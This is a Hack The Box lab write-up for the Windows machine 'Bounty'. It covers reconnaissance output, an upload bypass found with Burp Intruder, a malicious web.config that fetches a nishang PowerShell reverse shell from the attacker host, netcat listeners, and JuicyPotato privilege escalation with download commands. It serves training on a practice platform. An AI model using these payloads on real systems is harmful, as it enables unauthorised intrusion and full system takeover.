Open in app

Sign in

Write

Sign in

HTB: Bounty Write-up

Cameron Grimball
6 min readMay 11, 2021

Target Machine Information:

· Hostname : BOUNTY

· IP Address : 10.10.10.93

· OS : Windows

RECON:

sudo bash nmapAutomator 10.10.10.93 Reconsudo bash nmapAutomator 10.10.10.93 Basic---------------------Starting Nmap Basic Scan---------------------Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-28 17:52 EDT
Nmap scan report for 10.10.10.93
Host is up (0.036s latency).PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.03 seconds---------------------Running Recon Commands----------------------Starting gobuster scan===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.93:80
[+] Threads:        30
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Show length:    true
[+] Extensions:     html,asp,aspx,php
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2021/04/28 17:55:21 Starting gobuster
===============================================================
http://10.10.10.93:80/aspnet_client (Status: 301) [Size: 159]
http://10.10.10.93:80/transfer.aspx (Status: 200) [Size: 941]
http://10.10.10.93:80/uploadedfiles (Status: 301) [Size: 159]
===============================================================
2021/04/28 17:56:43 Finished
===============================================================

Services:

Port 80 http

ENUMERATION:

http://10.10.10.93:80
http://10.10.10.93:80/aspnet_client
http://10.10.10.93:80/transfer.aspx
http://10.10.10.93:80/uploadedfiles/

So we start by uploading some test objects into the transfer.aspx page.

We also see that it won’t take .aspx

To see what we can and can’t upload lets find a list of windows file extensions and run an intruder attack with Burp.

You can find the list here and we will name it extensions.txt (Make sure to remove the appended period from the extensions before using them in your attack.)

  1. Upload test.png
  2. Intercept in burp
  3. send to intruder

4. Load extensions list

5. Start Attack

When we are all finished we see that the “config” extension is the only one that has a different character length and when we render the web page we get a “File uploaded successfully”.

I then googled for “config file reverse shells” and found the code above from here.

We then paste it into a file called “web.config”

And upload it. After uploading we check for the file.

Cool, we get a response so now its time to find some code we can put in there to give us a reverse shell.

I failed a lot trying to use msfvenom as my reverse shell but I eventually found nishang and was able to get a powershell reverse shell on the machine.

First lets make our reverse shell

  1. git clone https://github.com/samratashok/nishang.git
  2. nano /nishang/shells/Invoke-PowerShellTcp.ps1
  3. Paste the following code at the bottom edit to your machine:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.15 -Port 1234

4. Rename: mv Invoke-PowerShellTcp.ps1 shell.ps1

5. Edit web.config code

<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.15:8000/shell.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>

6. python -m SimpleHTTPServer 8000

7. nc -lvnp 1234

8. Upload web.config again

9. Shell

Pro Tip: The user flag is hidden. Use “attrib” instead of “dir”command to find it.

attrib

PRIVILEGE ESCALATION:

So we go ahead and run systeminfo on it and get the results below

Host Name:                 BOUNTY
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                55041-402-3606965-84760
Original Install Date:     5/30/2018, 12:22:24 AM
System Boot Time:          4/30/2021, 11:08:31 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,585 MB
Virtual Memory: Max Size:  4,095 MB
Virtual Memory: Available: 3,593 MB
Virtual Memory: In Use:    502 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.93

We see it is running Microsoft Windows Server 2008 R2 so its likely vulnerable to a lot of kernel exploits. Normally I would have just thrown the results into windows exploit suggester but we’re going to try something different.

whoami /priv

SeImpersonatePrivilege is Enabled. Whenever you see that you should immediately try to use JuicyPotato on the machine for quick and easy escalation of privileges! Go ahead and add JuicyPotato.exe to your machine and run the command below in your shell.

(new-object net.webclient).downloadfile('http://10.10.14.11:8000/JuicyPotato.exe', 'C:\Users\merlin\Desktop\jp.exe')

So we have three mandatory arguments.

  • t : we’re going to put “*” so it will try both of the createprocess calls since we aren’t 100% certain on which one to try.
  • p : We need to create another file that will run and call back to our attack machine.
  • l : Finally we need to set a listening port. Which can be anything to be honest. So let’s use 4444.

First let’s make our revere shell. All we’re going to do is make a copy of our first shell and change the listening port at the bottom.

sudo cp shell.ps1 shell-2.ps1Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.15 -Port 2222

We can go ahead and download it to our victim machine.

(new-object net.webclient).downloadfile('http://10.10.14.15:8000/shell.bat', 'C:\Users\merlin\Desktop\shell.bat')

We then run our exploit and get a root shell!

Htb Writeup
Hackthebox

--

--

Cameron Grimball

Written by Cameron Grimball

14 Followers

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams